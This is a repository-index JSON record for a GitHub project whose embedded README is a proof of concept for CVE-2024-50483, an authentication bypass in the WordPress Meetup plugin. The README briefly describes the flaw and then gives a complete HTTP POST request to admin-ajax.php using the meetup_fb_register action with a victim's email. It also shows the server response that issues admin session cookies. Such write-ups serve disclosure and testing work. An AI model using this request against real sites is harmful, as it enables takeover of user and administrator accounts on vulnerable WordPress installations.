{"id":21125693,"url":"https://github.com/randomrobbiebf/cve-2024-50483","last_synced_at":"2026-01-02T11:59:29.543Z","repository":{"id":261317686,"uuid":"883950955","full_name":"RandomRobbieBF/CVE-2024-50483","owner":"RandomRobbieBF","description":"Meetup \u003c= 0.1 - Authentication Bypass via Account Takeover","archived":false,"fork":false,"pushed_at":"2024-11-05T21:40:58.000Z","size":2,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-01-21T05:41:45.576Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-05T21:38:44.000Z","updated_at":"2024-11-14T10:41:37.000Z","dependencies_parsed_at":"2024-11-05T22:35:20.926Z","dependency_job_id":"6e76cff0-fbc5-4aee-b5db-6b115f2674c0","html_url":"https://github.com/RandomRobbieBF/CVE-2024-50483","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-50483"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50483/manifests","owner_u
rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-50483/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243573163,"owners_count":20312879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:23.964Z","updated_at":"2026-01-02T11:59:29.501Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-50483\nMeetup \u0026lt;= 0.1 - Authentication Bypass via Account Takeover\n\n# Description:\nThe Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. 
This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.\n\n```\nCVE: CVE-2024-50483\nCVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nCVSS Score: 9.8\nSlugs: meetup\n```\n\nNote: You need to know the email address of the user you want to log in as.\n\nPOC\n---\n\n```\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: kubernetes.docker.internal\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 149\n\naction=meetup_fb_register\u0026email=admin@admin.com\u0026first_name=Test\u0026last_name=User\u0026id=12345678901234567890\u0026type=token\u0026link=https://example.com/user/test/\n\n```\n\nResponse\n--\n\n```\nHTTP/1.1 200 OK\nDate: Tue, 05 Nov 2024 21:37:23 GMT\nServer: Apache/2.4.57 (Debian)\nX-Powered-By: PHP/8.2.13\nX-Robots-Tag: noindex\nX-Content-Type-Options: nosniff\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\nCache-Control: no-cache, must-revalidate, max-age=0\nReferrer-Policy: strict-origin-when-cross-origin\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly\nSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly\nSet-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly\nContent-Length: 0\nContent-Type: text/html; 
charset=UTF-8\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50483","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50483","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50483/lists"}